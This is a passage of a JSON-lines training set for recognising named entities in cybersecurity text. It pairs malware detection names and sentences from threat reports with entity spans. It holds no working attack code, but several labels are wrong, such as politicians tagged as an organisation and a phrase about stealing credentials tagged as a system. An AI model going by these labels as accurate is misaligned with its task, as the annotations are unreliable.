"cyner2_train"}} {"text": "A backdoor also known as: Win32.Trojan.WisdomEyes.16070401.9500.9711 Spyware.Keylogger BehavesLike.Win32.Fake.lc Trojan-Proxy.Win32.Glukelira Trojan/Win32.Glukelira.R10186", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002814", "source": "cyner2_train"}} {"text": "A 
backdoor also known as: W32.HfsAdware.909D Downloader.AdloadCRT.Win32.596 Win.Trojan.Downloader-65968 not-a-virus:Downloader.Win32.AdLoad.rbbv Trojan.Win32.AdLoad.dvwwyc Adware.Downloadadmin.85624 Trojan.Vittalia.12437 not-a-virus:Downloader.DownloAdmin Pua.Downloadmanager RiskWare[Downloader]/Win32.AdLoad.rbbv Trojan.Application.Bundler.DownloadAdmin.3 PUP.DownloadAdmin/Variant not-a-virus:Downloader.Win32.AdLoad.rbbv PUP/Win32.DownloadAdmin.R162593 Downloader.DownloAdmin Trj/Downloader.WOL Win32/Application.d3c", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002816", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Inject Trojan.Bublik.Win32.19217 W32/Trojan.NHBC-1750 BKDR_BMDOOR.SMZAEK-A Trojan.Win32.Inject.wavu Trojan.Win32.Androm.dlcdpz Win32.Trojan.Inject.Duwc BKDR_BMDOOR.SMZAEK-A Trojan.Inject.gwc Trojan/Win32.Inject Trojan.Win32.Inject.wavu Trojan.Inject Trojan.Inject!zWOSv6fC2j0 Win32/Trojan.ae0", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002817", "source": "cyner2_train"}} {"text": "A backdoor also known as: Virus.Win32.Virut.1!O Hacktool.Virledi Win32.Worm.AutoRun.bz W32/Virut.AI PE_VIRUX.A-1 Worm.Win32.WBNA.roc Virus.Win32.Virut.hpeg Virus.Win32.Virut.CE Win32.HLLW.Autoruner2.15607 PE_VIRUX.A-1 W32/Virut.AI Win32/Virut.bt Virus/Win32.Virut.ce Worm:Win32/Virledi.A Worm.Win32.WBNA.roc Trojan/Win32.Zbot.C401270 Virus.Virut.06 Worm.AutoRun.FLD Win32.Virut.E Trojan-Downloader.Win32.VB Trj/Dtcontx.M", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002818", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan/W32.ProxyChanger.144352 Trojan.ProxyChanger Trojan/ProxyChanger.to Win32.Trojan.WisdomEyes.16070401.9500.9857 Trojan.Win32.ProxyChanger.mx Trojan.Win32.Z.Proxychanger.144352 Trojan.Proxy.27390 Trojan.ProxyChanger.Win32.985 Trojan.Win32.ProxyChanger W32/Trojan.WVYD-3840 TrojanDownloader.Cabby.ug TR/Crypt.ZPACK.137306 
Trojan/Win32.ProxyChanger Trojan.Win32.ProxyChanger.mx Trojan:Win32/Tepoyx.K Trojan/Win32.Cryptolocker.R145008 Trojan.ProxyChanger Win32/ProxyChanger.TO Trojan.ProxyChanger!ZhCr5dI6SeY W32/Kryptik.DEQP!tr Win32/Trojan.0f5", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002819", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Heur.GZ.E0D821 Ransom_Blocker.R004C0DK917 Win32.Trojan.WisdomEyes.16070401.9500.9999 Ransom_Blocker.R004C0DK917 Trojan-Ransom.Win32.Blocker.kklp Backdoor.Win32.Zelug.ER BehavesLike.Win32.BadFile.mt TR/Barys.796 Trojan[Downloader]/Win32.Dapato Backdoor:Win32/Zelug.B Trojan-Ransom.Win32.Blocker.kklp TScope.Malware-Cryptor.SB W32/Dapato.A!tr.dldr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002821", "source": "cyner2_train"}} {"text": "The backdoor has been analyzed previously and is a robust tool associated with this group, likely being used as an early stage reconnaissance tool.", "spans": {"MALWARE: backdoor": [[4, 12]], "MALWARE: tool": [[58, 62]], "THREAT_ACTOR: group,": [[84, 90]], "MALWARE: tool.": [[142, 147]]}, "info": {"id": "cyner2_train_002823", "source": "cyner2_train"}} {"text": "It has frequently been used to spread cryptocurrency mining malware, perhaps indicating an evolution towards direct monetization.", "spans": {"MALWARE: cryptocurrency mining malware,": [[38, 68]]}, "info": {"id": "cyner2_train_002824", "source": "cyner2_train"}} {"text": "Due to these two layers, we use the name TwoFace to track this webshell.", "spans": {"MALWARE: TwoFace": [[41, 48]], "MALWARE: webshell.": [[63, 72]]}, "info": {"id": "cyner2_train_002828", "source": "cyner2_train"}} {"text": "Because of the active investigation, I cannot reveal C&C domains used in the samples.", "spans": {}, "info": {"id": "cyner2_train_002829", "source": "cyner2_train"}} {"text": "The discovered Javascript code runs hidden in the browser and activates when text is entered on a payment page.", 
"spans": {"SYSTEM: browser": [[50, 57]]}, "info": {"id": "cyner2_train_002830", "source": "cyner2_train"}} {"text": "These included Fabrizio Saccomanni, the former deputy governor of the Bank of Italy, Piero Fassino, the former mayor of Turin, several members of a Masonic lodge, Matteo Renzi, former prime minister of Italy and Mario Draghi, another former prime minister of Italy and now president of the European Central Bank.", "spans": {"ORGANIZATION: Fabrizio Saccomanni, the former deputy governor of the Bank of Italy, Piero Fassino, the former mayor of Turin, several members of a Masonic lodge, Matteo Renzi, former prime minister of Italy and Mario Draghi, another former prime minister of Italy and now president of the European Central Bank.": [[15, 312]]}, "info": {"id": "cyner2_train_002831", "source": "cyner2_train"}} {"text": "This particular family of information stealers has been around since 2011", "spans": {"THREAT_ACTOR: family of information stealers": [[16, 46]]}, "info": {"id": "cyner2_train_002832", "source": "cyner2_train"}} {"text": "A backdoor also known as: Win32.Worm.Sohanad.NGW Ransom/W32.Blocker.3009335 Trojan.Musta Win32.Worm.Sohanad.NGW TROJ_ZAPCHAST.BN Win32/Tnega.SdcSccB TROJ_ZAPCHAST.BN Trojan-Ransom.Win32.Blocker.kock Win32.Worm.Sohanad.NGW Trojan.Win32.Blocker.ewkvvx Troj.Ransom.W32.Blocker!c Win32.Trojan.Blocker.Ahon Win32.Worm.Sohanad.NGW W32/Trojan.VZLV-7504 TR/Autoit.ezxix Trojan:Win32/Musta.A Win32.Worm.Sohanad.NGW Trojan-Ransom.Win32.Blocker.kock Win32.Worm.Sohanad.NGW Trojan/Win32.Zapchast.R109977 Trojan-Ransom.Blocker Win32/Autoit.KE Worm.Win32.AutoIt Trj/CI.A Win32/Worm.f95", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002835", "source": "cyner2_train"}} {"text": "BankBot is particularly risky because it disguises itself as legitimate banking apps, typically using fake overlay screens to mimic existing banking apps and steal user credentials.", "spans": {"MALWARE: BankBot": [[0, 7]], "SYSTEM: 
banking apps,": [[72, 85]], "SYSTEM: banking apps": [[141, 153]], "SYSTEM: steal user credentials.": [[158, 181]]}, "info": {"id": "cyner2_train_002837", "source": "cyner2_train"}} {"text": "The dropper includes a 64 bit version of KONNI;", "spans": {"MALWARE: dropper": [[4, 11]], "SYSTEM: 64 bit version": [[23, 37]], "MALWARE: KONNI;": [[41, 47]]}, "info": {"id": "cyner2_train_002838", "source": "cyner2_train"}} {"text": "The C2 infrastructure contains a lack of sophistication such as open panels , reuse of old servers publicly tagged as malicious… So what ? After being publicly denounced by CSIS Group — a threat intelligence company in Denmark — Wolf Research was closed and a new organization named LokD was created .", "spans": {"ORGANIZATION: CSIS Group": [[173, 183]], "ORGANIZATION: Wolf Research": [[229, 242]], "ORGANIZATION: LokD": [[283, 287]]}, "info": {"id": "cyner2_train_002839", "source": "cyner2_train"}} {"text": "A backdoor also known as: VB:Trojan.Valyria.186 W97M/Downloader.c Trojan.OBLD-0 O97M_BOGAVERT.A VB:Trojan.Valyria.186 VB:Trojan.Valyria.186 VB:Trojan.Valyria.186 VB:Trojan.Valyria.186 W97M.DownLoader.110 O97M_BOGAVERT.A W97M/Downloader.c W97M/Dldr.Bogavert.xehvk TrojanDownloader:O97M/Bogavert.A HEUR.VBA.Trojan.e VB:Trojan.Valyria.186 Trojan-Downloader.O97M.Bogavert heur.macro.drop.fa", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002842", "source": "cyner2_train"}} {"text": "How did Gooligan emerge ? 
Our researchers first encountered Gooligan ’ s code in the malicious SnapPea app last year .", "spans": {"MALWARE: Gooligan": [[8, 16], [60, 68]], "MALWARE: SnapPea": [[95, 102]]}, "info": {"id": "cyner2_train_002843", "source": "cyner2_train"}} {"text": "Recent variants drop distinctively named malware such as KingKong.dll.", "spans": {"MALWARE: variants": [[7, 15]], "MALWARE: malware": [[41, 48]]}, "info": {"id": "cyner2_train_002845", "source": "cyner2_train"}} {"text": "Proofpoint researchers are tracking an espionage actor targeting organizations and high-value targets in defense and government.", "spans": {"ORGANIZATION: Proofpoint researchers": [[0, 22]], "THREAT_ACTOR: an espionage actor": [[36, 54]], "ORGANIZATION: organizations": [[65, 78]], "ORGANIZATION: high-value targets": [[83, 101]], "ORGANIZATION: defense": [[105, 112]], "ORGANIZATION: government.": [[117, 128]]}, "info": {"id": "cyner2_train_002846", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Dropper.Wolfst.A Trojan-Dropper.Win32!O TrojanDropper.Wolfst Trojan/Dropper.Wolfst TROJ_WOLFST.DRP Win32.Trojan.WisdomEyes.16070401.9500.9858 Trojan.Dropper TROJ_WOLFST.DRP Trojan.Dropper.Wolfst.A Trojan-Dropper.Win32.Wolfst Trojan.Dropper.Wolfst.A Trojan.Win32.Wolfst.ejqa Dropper.Wolfst.26146 Trojan.Dropper.Wolfst.A Trojan.Dropper.Wolfst.A Trojan.MulDrop.385 Dropper.Wolfst.Win32.8 BehavesLike.Win32.Dropper.tc W32/Trojan.DTTZ-6513 TrojanDropper.PeStaple.t RiskWare[RemoteAdmin]/Win32.RMS Trojan.Dropper.Wolfst.A W32.W.Bybz.lwoN Trojan-Dropper.Win32.Wolfst Dropper/Win32.Wolfst.R141816 Trojan.Dropper.Wolfst.A TScope.Trojan.Delf Trojan.DR.Wolfst!967kQq5cZ1Q Trojan-Dropper.Win32.Wolfst", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002848", "source": "cyner2_train"}} {"text": "For more information, see information on the EITest campaign in the Unit 42 blog titled: Decline in Rig Exploit Kit.", "spans": {"THREAT_ACTOR: the EITest campaign": [[41, 60]], 
"ORGANIZATION: the Unit 42": [[64, 75]], "MALWARE: Rig Exploit Kit.": [[100, 116]]}, "info": {"id": "cyner2_train_002850", "source": "cyner2_train"}} {"text": "A backdoor also known as: W32.IlamMak.Trojan Trojan.Win32.Delf!O Trojan.Delf Trojan.Delf.Win32.9224 Win32.Trojan.Delf.ii W32/Trojan.HGGE-3556 Infostealer.Yahmali Win32/Yahmali.C TSPY_YAHMALI.B Trojan.Win32.Delf.aam Trojan.Win32.Delf.dxmnga TSPY_YAHMALI.B Trojan-GameThief.Win32.Nilage W32/Trojan2.OXXZ Trojan/Delf.ia TR/Delf.aam.35 Trojan/Win32.Delf Win32.Virut.ce.57344 PWS:Win32/Yahmali.A Trojan.Win32.A.Delf.104448 Trojan.Win32.Delf.aam Trojan/Win32.Yahmali.R25760 Trojan.Autorun.Havijak.1 Trojan.PasswordStealer W32/FolderToEXE.A.worm Win32/Delf.AAM Trojan.Delf!QRjoRop97so", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002852", "source": "cyner2_train"}} {"text": "The Elf.BillGates version targets Linux operating system.", "spans": {"SYSTEM: Linux operating system.": [[34, 57]]}, "info": {"id": "cyner2_train_002853", "source": "cyner2_train"}} {"text": "A backdoor also known as: Win32.Trojan.WisdomEyes.16070401.9500.9995", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002854", "source": "cyner2_train"}} {"text": "A backdoor also known as: Win32.Trojan.WisdomEyes.16070401.9500.9933 Trojan.Win32.Pincav.dxbist Trojan.Win32.Z.Zusy.618496.BJ Trojan.DownLoader22.56304 BehavesLike.Win32.AdwareConvertAd.jh TR/AD.Corebot.mgjun Trojan.Zusy.D27BC8 Trojan:Win32/Corebot.A Trojan.Downloader Win32/Trojan.BO.918", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002855", "source": "cyner2_train"}} {"text": "Since then, it has evolved fairly rapidly and has added new capabilities, as reported.", "spans": {}, "info": {"id": "cyner2_train_002856", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Mauvaise.SL1 Trojan.Inject.Win32.237373 Troj.W32.Inject!c W32/Trojan.JMPH-3101 Trojan.Win32.Inject.aeryd Trojan.Win32.Banbra.elzzqd 
Trojan.MulDrop7.31178 BehavesLike.Win32.PUPXBY.dh Trojan.Inject.vwf TR/Sfuzuan.jhmvt Trojan.Ursu.D4870 Trojan.Win32.Inject.aeryd Trojan:Win32/Sfuzuan.B!bit Trj/GdSda.A Win32.Trojan.Inject.Wklz Trojan.PWS.Banbra!c5Sww8Szjr0 Trojan.Win32.Sfuzuan", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002860", "source": "cyner2_train"}} {"text": "Within the time between the discovery of the vulnerability and the release of the fix, a bad actor might try to get the most out of his previously valuable attack assets.", "spans": {"VULNERABILITY: vulnerability": [[45, 58]], "THREAT_ACTOR: bad actor": [[89, 98]]}, "info": {"id": "cyner2_train_002862", "source": "cyner2_train"}} {"text": "This malware has been reported to have been used in high profile breaches like the ones at Wellpoint/Anthem, VAE Inc, USIS and Mitsubishi Heavy Industries.", "spans": {"MALWARE: malware": [[5, 12]], "ORGANIZATION: high profile": [[52, 64]], "ORGANIZATION: Wellpoint/Anthem, VAE Inc, USIS": [[91, 122]], "ORGANIZATION: Mitsubishi Heavy Industries.": [[127, 155]]}, "info": {"id": "cyner2_train_002864", "source": "cyner2_train"}} {"text": "A backdoor also known as: TROJ_DLDR.SMI Win32.Trojan.WisdomEyes.16070401.9500.9976 Trojan.Adclicker TROJ_DLDR.SMI Trojan.Win32.CcKrizCry.dpsxlj Troj.Downloader.W32.Helminthos.kZDa Downloader.KrizCry.Win32.252 BehavesLike.Win32.Backdoor.dm TR/Malushka.umxne Trojan[Downloader]/Win32.CcKrizCry TrojanDownloader:Win32/Malushka.T Trojan/Win32.Cckrizcry.R7632 Win32.Trojan.Dldr.Lscd W32/KrizCry.M!tr.dldr Win32/Trojan.3f8", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002865", "source": "cyner2_train"}} {"text": "A backdoor also known as: W32.Vetor.PE Virus.Win32.Virut.1!O W32.Virut.G PE_VIRUX.R Win32.Trojan.WisdomEyes.16070401.9500.9999 W32/Worm.GBYU-0953 W32.Virut.CF Win32/Virut.17408 PE_VIRUX.R Virus.Win32.Virut.ce Virus.Win32.Virut.hpeg Worm.Win32.Delf.579072 Virus.Win32.Virut.CE Win32.Virut.56 Virus.Virut.Win32.1938 
Virus.Win32.Ramnit W32/Worm.APDA Win32/Virut.bt Virus/Win32.Virut.ce W32.Virut.lJ4T Virus.Win32.Virut.ce HEUR/Fakon.mwf Virus.Virut.14 W32/Sality.AO Virus.Win32.Virut.M", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002866", "source": "cyner2_train"}} {"text": "The in-depth report provides an analysis of technology, impact, possible attribution – and a signature to detect the malware.", "spans": {"MALWARE: malware.": [[117, 125]]}, "info": {"id": "cyner2_train_002867", "source": "cyner2_train"}} {"text": "A backdoor also known as: Win32.Trojan.WisdomEyes.16070401.9500.9995 Trojan-Downloader.Win32.VB.aohd Trojan.Win32.VB.ecbrdj Trojan.DownLoad2.47277 BehavesLike.Win32.BadFile.nm TrojanDownloader.VB.dkqk Trojan-Downloader.Win32.VB.aohd TrojanDownloader:Win32/Vbload.J", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002868", "source": "cyner2_train"}} {"text": "BadRabbit is distributed as a fake flash update, and reportedly using Mimikatz, the Eternal Romance exploit, and a list of passwords to spread via SMB in a worm-like fashion.", "spans": {"MALWARE: BadRabbit": [[0, 9]], "MALWARE: Mimikatz, the Eternal Romance exploit,": [[70, 108]], "SYSTEM: SMB": [[147, 150]]}, "info": {"id": "cyner2_train_002870", "source": "cyner2_train"}} {"text": "A backdoor also known as: Backdoor.Bitsto BKDR_BISCUIT.A Win32.Trojan.WisdomEyes.16070401.9500.9997 W32/TrojanX.EGVY BKDR_BISCUIT.A Trojan.Win32.Click.dsvjap Trojan.Click.31006 BehavesLike.Win32.RAHack.nc W32/Trojan.RGTL-7538 Backdoor:Win32/Bitsto.A Adware/Win32.NaviPromo.R36681", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002871", "source": "cyner2_train"}} {"text": "A backdoor also known as: RiskWare.Tool.CK Trojan.Tool!qSvNdOK1TCo Riskware.Win32.ASEye.cjxuqg Virus.Win32.Heur.c Tool.ASEye.2 BehavesLike.Win32.ToolTPatch.lm Unwanted/Win32.Patch Hacktool.Win32.TPE.BA Trojan.Feutel.AV", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": 
"cyner2_train_002873", "source": "cyner2_train"}} {"text": "We estimate that through the malware s malicious activities, the perpetrators behind it gained over $1.5 million over the course of two months.", "spans": {"MALWARE: malware": [[29, 36]], "THREAT_ACTOR: the perpetrators": [[61, 77]]}, "info": {"id": "cyner2_train_002875", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.MSIL.FC.6901 Win32.Trojan.WisdomEyes.16070401.9500.9999 Trojan.Win32.Diztakun.dbjduc Win32.Trojan.Spy.Sudw BehavesLike.Win32.Trojan.dh Trojan.Win32.Diztakun W32/Trojan.IYBN-7194 Trojan.Kazy.D82509 Trojan:MSIL/Diztakun.A!bit Trojan/Win32.Diztakun.C2318558 Trj/GdSda.A Win32/Trojan.c81", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002876", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan/StartPage.axk Trojan.Startpage Win.Trojan.Startpage-757 Trojan.MSIL.StartPage.bo Trojan.Win32.StartPage.eaqxl Trojan.StartPage.22255 Trojan/StartPage.ajy TR/StartPage.axk.2 Trojan:MSIL/Startpage.A Trojan.MSIL.StartPage.bo Trojan/Win32.StartPage.C59843 Trj/CI.A MSIL/StartPage.A Win32.Trojan.Startpage.cduj Trojan.StartPage!8fKymuz2/+o Trojan.Win32.StartPage W32/StartPage.PL!tr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002877", "source": "cyner2_train"}} {"text": "A backdoor also known as: W32/Morto.dll.b Trojan/Morto.l WORM_MORTO.SM2 Worm.Win32.Morto!IK Worm.Win32.Morto.~dln Worm/Morto.dlnam WORM_MORTO.SM2 W32/Morto.dll.b Worm:Win32/Morto.D Worm/Win32.Morto Worm.Win32.Morto.h Worm.Win32.Morto W32/Morto.A!tr Worm/Morto.D", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002878", "source": "cyner2_train"}} {"text": "Adversaries have been seen leveraging JexBoss, an open source tool for testing and exploiting JBoss application servers, to gain a foothold in the network.", "spans": {"MALWARE: JexBoss,": [[38, 46]], "SYSTEM: JBoss application servers,": [[94, 120]]}, "info": {"id": 
"cyner2_train_002879", "source": "cyner2_train"}} {"text": "In this case, Proofpoint researchers discovered an infected Android version of the newly released mobile game Pokemon GO", "spans": {"ORGANIZATION: Proofpoint researchers": [[14, 36]], "SYSTEM: Android version": [[60, 75]], "SYSTEM: mobile game Pokemon GO": [[98, 120]]}, "info": {"id": "cyner2_train_002881", "source": "cyner2_train"}} {"text": "Upon loading the rtf document, it will drop a base64 encoded powershellscript in the following location:%TEMP%\\log.ps1", "spans": {}, "info": {"id": "cyner2_train_002882", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Detrahere Trojan.Midie.DA596 TROJ_KRYPTIK_HA22006D.UVPM Trojan.Win32.DownLoad3.exdqqe Trojan.DownLoad3.64586 Trojan.Kryptik.Win32.1347406 TROJ_KRYPTIK_HA22006D.UVPM Trojan.MSIL.ikyj TR/Crypt.ZPACK.hgndb Trojan:Win32/Detrahere.E Trojan/Win32.Tiggre.R216587 Trojan.Crypt Win32/Trojan.daa", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002883", "source": "cyner2_train"}} {"text": "Now more threat actors are leveraging the vulnerability in Microsoft Server Message Block SMB protocol – this time to distribute Backdoor.Nitol and Trojan Gh0st RAT.", "spans": {"THREAT_ACTOR: threat actors": [[9, 22]], "VULNERABILITY: vulnerability": [[42, 55]], "SYSTEM: Microsoft Server Message Block SMB protocol": [[59, 102]], "MALWARE: Trojan Gh0st RAT.": [[148, 165]]}, "info": {"id": "cyner2_train_002884", "source": "cyner2_train"}} {"text": "Specifically, the format resembles custom virtual machine code, where numeric hexadecimal identifiers present in the configuration file make the stealer run desired functions.", "spans": {"SYSTEM: virtual machine": [[42, 57]], "MALWARE: stealer run": [[145, 156]]}, "info": {"id": "cyner2_train_002886", "source": "cyner2_train"}} {"text": "A backdoor also known as: Win32.Stration.DDA@mm Win32.Stration.DDA@mm I-Worm.Warezov.r3 Win32.Stration.DDA@mm Trojan.Win32.Warezov.ehypz W32/Worm.ARBW 
W32.Stration@mm Win32.Stration.DDA@mm I-Worm.Opnis!V3KJQVovhbU I-Worm.Win32.Warezov.20480.AW[h] Win32.Worm-email.Warezov.Lpvc Win32.Stration.DDA@mm Worm.Win32.Warezov.~AD Win32.Stration.DDA@mm Win32.HLLM.Limar.3939 Worm.Warezov.Win32.123 W32/Worm.IQCC-3677 I-Worm.Warezov.bu WORM/Warezov.2048.1 W32/Stration.KG!tr Worm[Email]/Win32.Warezov Win32.Stration.E878FD Worm:Win32/Stration.ST Win32/Stration.AHP Worm.Win32.Warezov.aK Worm.Win32.Warezov Win32.Stration.DDA@mm Trj/CI.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002887", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Heur.E38E91 Win32.Trojan.WisdomEyes.16070401.9500.9982 WORM_AMBLER.SMZ Trojan-Spy.Win32.Amber.zdc Trojan.Win32.Amber.etbxtl Win32.Trojan-spy.Amber.Wskc Trojan-Spy.Win32.Ambler WORM_AMBLER.SMZ BehavesLike.Win32.Virut.qc Trojan-Dropper.Win32.Ambler W32/Trojan.MMWY-8251 TrojanSpy:Win32/Ambler.D Trojan-Spy.Win32.Ambler Win32/AutoRun.Spy.Ambler.NAW", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002890", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Keylogger.Win32.19936 Trojan/Spy.nut Win32.Trojan.WisdomEyes.16070401.9500.9996 Trojan.DownLoader6.20458 Trojan/Win32.Graftor.R31665 TrojanSpy.KeyLogger!VshB9boiuX0 Trj/CI.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002892", "source": "cyner2_train"}} {"text": "With that inclusion, companies running on those systems will also be at risk.", "spans": {}, "info": {"id": "cyner2_train_002894", "source": "cyner2_train"}} {"text": "A backdoor also known as: RemoteAdmin.Win32.RAT!O Backdoor.Daromec Backdoor.Breut not-a-virus:RemoteAdmin.Win32.RAT.a Trojan.Win32.MLW.dbyfty BackDoor.Comet.21 Trojan[RemoteAdmin]/Win32.RAT not-a-virus:RemoteAdmin.Win32.RAT.a Backdoor:Win32/Daromec.A RiskWare.RemoteAdmin Trojan.MiniUPnP!L9xsRhGGfN0", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002896", "source": "cyner2_train"}} 
{"text": "That domain still hosts the malicious Flash file CVE-2015-7645 that it previously used in standalone attacks.", "spans": {"MALWARE: malicious": [[28, 37]], "SYSTEM: Flash": [[38, 43]]}, "info": {"id": "cyner2_train_002898", "source": "cyner2_train"}} {"text": "On August 4, 2016, the Gmail account of an unknown individual was compromised in order to conduct spearphishing campaigns against a diverse set of targets related to Iran.", "spans": {"SYSTEM: Gmail account": [[23, 36]], "ORGANIZATION: unknown individual": [[43, 61]], "THREAT_ACTOR: spearphishing campaigns": [[98, 121]]}, "info": {"id": "cyner2_train_002899", "source": "cyner2_train"}} {"text": "The attack is part of a trend where threat groups hide malicious activity by communicating with legitimate web services such as social networking and cloud storage sites to foil detection efforts.", "spans": {"ORGANIZATION: trend": [[24, 29]], "THREAT_ACTOR: threat groups": [[36, 49]]}, "info": {"id": "cyner2_train_002900", "source": "cyner2_train"}} {"text": "A backdoor also known as: Program.Hadsruda Trojan.Razy.D2C7F5 Win32.Trojan-Downloader.Adload.aa Win.Malware.Zusy-5689722-0 Riskware.Win32.AdLoad.epwtbh Adware.Oxypumper.159236 Application.Win32.OxyPumper.ADA Trojan.DownLoader26.15650 Adware.OxyPumper.Win32.616 BehavesLike.Win32.Trojan.cc W32/Trojan.TQZU-9354 Adware.Adload.cqi ADWARE/OxyPumper.vgssx GrayWare[AdWare]/Win32.AdLoad Adware.OxyPumper/Variant Trojan.Downloader Trj/GdSda.A Win32.Trojan.Razy.Lmkk PUA.AdLoad! 
PUA.OxyPumper Win32/Trojan.4e9", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002901", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Dynamer.A5 Win32.Trojan.WisdomEyes.16070401.9500.9603 not-a-virus:NetTool.Win64.RPCHook.a BehavesLike.Win32.Downloader.vc TrojanDownloader.Paph.ds Trojan[Downloader]/Win32.Betload Trojan.Jaike.DD8D Troj.W32.Inject.tnKf not-a-virus:NetTool.Win64.RPCHook.a Trojan-Downloader.Win32.Moure Trj/CI.A", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002902", "source": "cyner2_train"}} {"text": "We previously reported on SamSam ransomware charging high ransoms for infected servers.", "spans": {"MALWARE: SamSam ransomware": [[26, 43]], "SYSTEM: infected servers.": [[70, 87]]}, "info": {"id": "cyner2_train_002903", "source": "cyner2_train"}} {"text": "A backdoor also known as: W32.S_Gamma.Trojan Trojan/W32.Obfuscated.770368 Trojan.Win32.Obfuscated!O Trojan.VBCrypt.MF.137 WORM_IRCBOT.BXN Win32.Worm.VB.rx W32/VB.Worm.A W32.Mibling Win32/Malinbot.A WORM_IRCBOT.BXN Trojan.Win32.Obfuscated.aiiz Trojan.Win32.Obfuscated.700736 Troj.W32.Obfuscated.l2p6 Trojan.Click.43851 BehavesLike.Win32.Ramnit.bc W32/VB.Worm.A Worm:Win32/Lamin.A Worm:Win32/Lamin.A Trojan.Win32.Obfuscated.aiiz Trojan.Obfuscator Trj/Dropper.AJT Win32/VB.NRJ Trojan.Obfuscated.AHVV", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002905", "source": "cyner2_train"}} {"text": "A backdoor also known as: Win32/PSW.Katalog Trojan-PWS/W32.Katalog.61440 Trojan/PSW.Katalog Trojan.PWS.Katalog!pK2Uo9nMTKQ TROJ_KATALOG.A Trojan-PSW.Win32.Katalog Trojan.Win32.Katalog-Psw.fjsg Trojan.Win32.A.PSW-Katalog.61440[h] TrojWare.Win32.PSW.Katalog TROJ_KATALOG.A W32/Trojan.XHBZ-0001 Trojan/PSW.Katalog TR/Katalog.PSW W32/Katalog.A!tr.pws Trojan[PSW]/Win32.Katalog Win32.Troj.pswKatalog.kcloud Downloader/Win32.VB TrojanPSW.Katalog Trj/PSW.Katalog Trojan.Win32.InfoStealer.Ahg Win32/Trojan.PSW.b74", "spans": 
{"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002906", "source": "cyner2_train"}} {"text": "The Dark Power ransomware gang is new on the block, and is trying to make a name for itself.", "spans": {"THREAT_ACTOR: The Dark Power ransomware gang": [[0, 30]]}, "info": {"id": "cyner2_train_002907", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan/Dropper.Grizl.kp W32/Dropper.ANGS Infostealer.Gampass TSPY_ONLINEG.SMA Trojan-GameThief.Win32.Lmir!IK TrojWare.Win32.PSW.OnLineGames.NYT0 Trojan.PWS.Gamania.22629 TSPY_ONLINEG.SMA TrojanDropper:Win32/Lolyda.F W32/Dropper.ANGS Trojan/Win32.Lmir TrojanPSW.Lmir.jfz Win32/PSW.OnLineGames.NYT Trojan.PSW.Win32.GameOnline.gcv Trojan-GameThief.Win32.Lmir W32/Grizl.GA!tr.dldr PSW.OnlineGames3.WPS Trj/Krap.Y", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002912", "source": "cyner2_train"}} {"text": "A backdoor also known as: Trojan.Ransom.BHE Ransom.Petya.S19638 Trojan.Ransom.BHE W32/GoldenEye.SONR-5498 Ransom.Goldeneye Ransom_PETYA.SM1 Trojan.Ransom.BHE Trojan.Win32.MBRlock.epgnaf Trojan.Ransom.BHE Trojan.MBRlock.265 Trojan-Ransom.GoldenEye W32/GoldenEye.D Trojan.DiskWriter.bp W32/Petya.D!tr.ransom Trojan.Ransom.BHE Trojan/Win32.Petr.C1697437 Trojan.Ransom.BHE Ransom.Petya Trojan.Petya Hoax.Petr", "spans": {"MALWARE: backdoor": [[2, 10]]}, "info": {"id": "cyner2_train_002914", "source": "cyner2_train"}} {"text": "A backdoor also known as: HW32.Packed.AB21 Trojan-Downloader.Win32.Firu!O Troj.Downloader.W32!c Trojan/Downloader.Firu.bp 